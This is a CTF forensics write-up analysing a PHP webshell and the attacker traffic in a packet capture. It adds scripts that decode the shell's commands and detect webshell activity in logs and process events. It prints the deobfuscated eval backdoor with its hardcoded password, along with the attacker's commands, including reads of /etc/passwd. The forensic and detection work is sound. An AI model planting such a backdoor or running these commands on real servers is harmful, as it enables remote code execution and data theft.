Obscure is an Easy-rated HackTheBox forensics challenge. You get a packet capture and a PHP webshell that was uploaded to a compromised Apache server through an arbitrary file upload vulnerability. The task is to analyse the shell and trace the attacker's activity through the capture.
Analysing the webshell
The uploaded file is support.php. It is heavily obfuscated PHP with three layers: the outer layer is base64 encoded, the middle layer rebuilds function names from string fragments and calls them through variables, and the inner layer is the actual eval-based shell. Replacing each layer's eval with echo, or running the file in a throwaway PHP sandbox with eval replaced by print, peels the layers off one at a time and reveals the core (never execute the shell as-is on an analysis box you care about):
<?php
session_start(); // needed for $_SESSION to survive between requests
if(isset($_POST["login"])) {
    if($_POST["login"] === base64_decode("c2VjdXJlUGFzc3dvcmQx")) { // "securePassword1"
        $_SESSION["auth"] = true;
    }
}
if(!empty($_SESSION["auth"])) {
    eval(base64_decode($_POST["cmd"])); // attacker-supplied PHP, executed as the Apache user
}
?>
The login parameter is compared against a hardcoded password that decodes to securePassword1. Once the session is authenticated, the cmd parameter is base64 decoded and passed straight to eval. Functionally, this is a complete remote code execution backdoor in a few lines, with the password preventing other attackers from hijacking it.
Following the traffic
tshark -r obscure.pcap -Y 'http.request.method == "POST" and http contains "support.php"' \
    -T fields -e frame.number -e http.file_data | head -30
Decoding the cmd field from each POST request in sequence reveals the attacker activity:
Request 3: system('id'); # response shows the command ran as www-data, the Apache worker user
Request 5: system('cat /etc/passwd');
Request 8: system('find / -name "*.txt" -readable 2>/dev/null');
Request 11: system('cat /var/www/html/flag.txt');
Following the TCP stream for request 11 (Follow > TCP Stream in Wireshark, or tshark -q -z follow,tcp,ascii,<stream number>) shows the flag in the HTTP response body.
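The decoding step above is easy to do by hand for four requests, but a real incident has hundreds. The script below is an added example, not part of the original writeup or the challenge files: it takes the tab-separated output that the tshark command prints (frame number and POST body), URL-decodes the body, base64-decodes the cmd parameter, and produces an ordered timeline, flagging any body whose cmd is not valid base64 so it gets a second look instead of silently vanishing. The sample lines, frame numbers and the helper names `_b64` and `_body` are constructed for this example.

```python
import base64
import binascii
from urllib.parse import parse_qs, quote


def _b64(php):
    """Encode PHP the way the shell's cmd parameter expects it (helper for the sample)."""
    return base64.b64encode(php.encode()).decode()


def _body(**params):
    """URL-encode a POST body; parse_qs undoes this on the way back (helper for the sample)."""
    return "&".join(f"{k}={quote(v, safe='')}" for k, v in params.items())


# Constructed sample in the shape that
#   tshark -r obscure.pcap -Y '...' -T fields -e frame.number -e http.file_data
# prints: one tab-separated line per matching request. Frame numbers and bodies
# are made up for this example, not taken from the challenge pcap; frame 97
# carries deliberately malformed data to exercise the error path.
SAMPLE_TSHARK_OUTPUT = "\n".join([
    "41\t" + _body(login="securePassword1"),
    "58\t" + _body(cmd=_b64("system('id');")),
    "73\t" + _body(cmd=_b64("system('cat /etc/passwd');")),
    "89\t" + _body(cmd=_b64("system('find / -name \"*.txt\" -readable 2>/dev/null');")),
    "97\t" + _body(cmd="not-base64!!"),
    "112\t" + _body(cmd=_b64("system('cat /var/www/html/flag.txt');")),
])


def decode_shell_requests(tshark_output):
    """Turn tshark field output into an ordered list of attacker actions.

    Each entry carries the frame number plus, depending on the body, the
    password presented to the login parameter, the PHP that reached eval(),
    or an error when cmd was not valid base64 (noise, a typo, or another
    encoding layer that deserves a closer look).
    """
    events = []
    for line in tshark_output.splitlines():
        if not line.strip():
            continue
        frame, _, body = line.partition("\t")
        params = parse_qs(body, keep_blank_values=True)  # also undoes %3D etc.
        event = {"frame": int(frame)}
        if "login" in params:
            event["login"] = params["login"][0]
        if "cmd" in params:
            raw = params["cmd"][0]
            try:
                # validate=True rejects non-alphabet bytes instead of skipping them
                event["php"] = base64.b64decode(raw, validate=True).decode("utf-8", "replace")
            except (binascii.Error, ValueError) as exc:
                event["error"] = f"cmd is not valid base64: {exc}"
        events.append(event)
    return events


def timeline(events):
    """One human-readable line per request, in capture order."""
    lines = []
    for e in events:
        if "login" in e:
            lines.append(f"frame {e['frame']}: login with password {e['login']!r}")
        if "php" in e:
            lines.append(f"frame {e['frame']}: eval -> {e['php']}")
        if "error" in e:
            lines.append(f"frame {e['frame']}: {e['error']}")
    return lines


if __name__ == "__main__":
    print("\n".join(timeline(decode_shell_requests(SAMPLE_TSHARK_OUTPUT))))
```

To run it against the real capture, pipe the tshark command's output into a file and pass its contents to decode_shell_requests; frames that show up as errors are the ones worth opening in Wireshark, since they may be using a different encoding than the rest of the session.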
Detection perspective
New PHP files appearing in upload directories, POST requests to paths that should only serve static files, and web server worker processes spawning system shells are the three layers of telemetry where this attack is detectable. A web server worker spawning /bin/sh (or cmd.exe on Windows) should trigger an immediate alert in any environment with process creation monitoring, because the shell's system() calls cannot avoid it.
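Two of those three layers can be checked with a few lines of code. The example below is added here and is not part of the original writeup: it runs a request-level rule (a script extension, or a POST, under a directory that should only serve static files) over constructed Apache combined-format access log lines, and a process-level rule (a web server parent spawning a shell) over constructed execve-style events of the kind auditd or an EDR would produce. The directory list, the log lines and the process events are assumptions made for the example.

```python
import re

# Constructed Apache combined-format access log (not from the challenge). The
# last two lines model the webshell being driven after the upload succeeded.
ACCESS_LOG = """\
10.0.0.5 - - [12/Mar/2024:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2024:10:04:17 +0000] "POST /upload.php HTTP/1.1" 200 88 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2024:10:04:31 +0000] "GET /uploads/avatar.png HTTP/1.1" 200 4210 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2024:10:05:02 +0000] "POST /uploads/support.php HTTP/1.1" 200 21 "-" "python-requests/2.31"
10.0.0.9 - - [12/Mar/2024:10:05:09 +0000] "GET /uploads/support.php?cmd=aWQ%3D HTTP/1.1" 200 1422 "-" "python-requests/2.31"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Directories that should only ever serve static content (assumed site layout).
STATIC_DIRS = ("/uploads/", "/images/", "/static/")
# Extensions mod_php will execute, including double-extension tricks like x.php.png.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)(\.|$)", re.IGNORECASE)


def flag_access_log(log_text):
    """Return one finding per access-log line that matches a detection rule."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m["path"].split("?", 1)[0]  # ignore the query string when matching
        reasons = []
        if path.startswith(STATIC_DIRS):
            if SCRIPT_EXT.search(path):
                reasons.append("script requested from static-only directory")
            if m["method"] == "POST":
                reasons.append("POST to static-only directory")
        if reasons:
            findings.append({"ip": m["ip"], "ts": m["ts"], "method": m["method"],
                             "path": path, "reasons": reasons})
    return findings


# Constructed process-creation events in the shape an execve audit rule or an
# EDR would yield: (parent_comm, user, child_comm, cmdline). Not real telemetry.
PROCESS_EVENTS = [
    ("systemd", "root", "apache2", "/usr/sbin/apache2 -k start"),
    ("apache2", "www-data", "apache2", "/usr/sbin/apache2 -k start"),
    ("apache2", "www-data", "sh", "sh -c id"),
    ("apache2", "www-data", "sh", "sh -c cat /var/www/html/flag.txt"),
    ("sshd", "alice", "bash", "-bash"),
]

WEB_SERVERS = {"apache2", "httpd", "php-fpm", "nginx"}
SHELLS = {"sh", "bash", "dash", "zsh", "cmd.exe", "powershell.exe"}


def flag_webserver_shells(events):
    """Return the events where a web server process spawned a shell."""
    return [e for e in events if e[0] in WEB_SERVERS and e[2] in SHELLS]


if __name__ == "__main__":
    for f in flag_access_log(ACCESS_LOG):
        print(f["ts"], f["ip"], f["method"], f["path"], "->", "; ".join(f["reasons"]))
    for e in flag_webserver_shells(PROCESS_EVENTS):
        print("web server spawned shell:", e)
```

The request rule fires twice on the sample (the POST and the GET to /uploads/support.php) and stays quiet for the legitimate upload endpoint and the image fetch; the process rule catches the two sh -c children of apache2 that the shell's system() calls produce, and ignores the user's SSH session. The third layer, file creation in the upload directory, is a job for inotify or the EDR's file events rather than for log parsing.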